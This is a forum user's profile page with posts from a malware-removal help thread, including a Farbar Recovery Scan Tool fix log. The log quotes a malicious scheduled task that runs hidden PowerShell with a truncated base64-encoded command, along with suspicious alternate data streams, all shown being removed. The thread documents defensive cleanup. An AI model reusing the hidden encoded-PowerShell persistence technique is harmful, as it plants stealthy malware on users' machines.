About chandraquan

  • Rank
    New Member
  1. NICE, PowerShell no longer automatically runs when Windows starts up. CPU usage is no longer high. Malwarebytes is no longer blocking a suspicious IP. Thank you, Aura.
  2. Hi Aura, thank you for reopening the topic. Here is the log after I hit the "Fix" button with the fixlist you've attached.

     Fix result of Farbar Recovery Scan Tool (x64) Version: 21.01.2018
     Ran by Quan (22-01-2018 12:24:40) Run:1
     Running from D:\farbar
     Loaded Profiles: Quan (Available Profiles: Quan & Presentasi)
     Boot Mode: Normal
     ==============================================

     fixlist content:
     *****************
     Task: {00C35954-49AB-475B-B042-C6C1B3D17C68} - System32\Tasks\d2d7fc3b-166f-5c4c-5cd26c7af69743e4 => C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -NonInteractive -WindowStyle Hidden -EncodedCommand JABZAGMAWABtAHAAYgBGAEgANwAgAD0AIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFMAaABlAGwAbAAiADsAJABiAEIASwBEAGUARAA0ACAAPQAgACIAewBFADEARgAwADgAQgBDADQALQA0ADMA (the data entry has 8048 more characters).
     AlternateDataStreams: C:\Windows:nlsPreferences [386]
     AlternateDataStreams: C:\ProgramData\TEMP:A1EDB939 [114]
     AlternateDataStreams: C:\Users\Quan\AppData\Local\Temporary Internet Files:a2hwWZ5yaeiwCL5kTfBDjfYiO6SR [2066]
     AlternateDataStreams: C:\Users\Quan\AppData\Local\Temporary Internet Files:nHikZdldrM6F4HXVwfkQPOsv [2116]
     *****************

     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{00C35954-49AB-475B-B042-C6C1B3D17C68} => could not remove key. ErrorCode1: 0x00000002
     "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{00C35954-49AB-475B-B042-C6C1B3D17C68}" => removed successfully
     C:\Windows\System32\Tasks\d2d7fc3b-166f-5c4c-5cd26c7af69743e4 => moved successfully
     "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\d2d7fc3b-166f-5c4c-5cd26c7af69743e4" => removed successfully
     C:\Windows => ":nlsPreferences" ADS removed successfully
     C:\ProgramData\TEMP => ":A1EDB939" ADS removed successfully
     C:\Users\Quan\AppData\Local\Temporary Internet Files => ":a2hwWZ5yaeiwCL5kTfBDjfYiO6SR" ADS removed successfully
     C:\Users\Quan\AppData\Local\Temporary Internet Files => ":nHikZdldrM6F4HXVwfkQPOsv" ADS removed successfully

     ==== End of Fixlog 12:24:41 ====

     :) Fixlog.txt
  3. I should thank Malwarebytes for removing the ransomware from my PC. Unfortunately, it doesn't fix my computer completely. I read a post, so I ran the same thing as it was told. Please help me analyze my FRST and Addition files reported by the Farbar recovery tool. What should I fix, and what should I do next? Addition.txt FRST.txt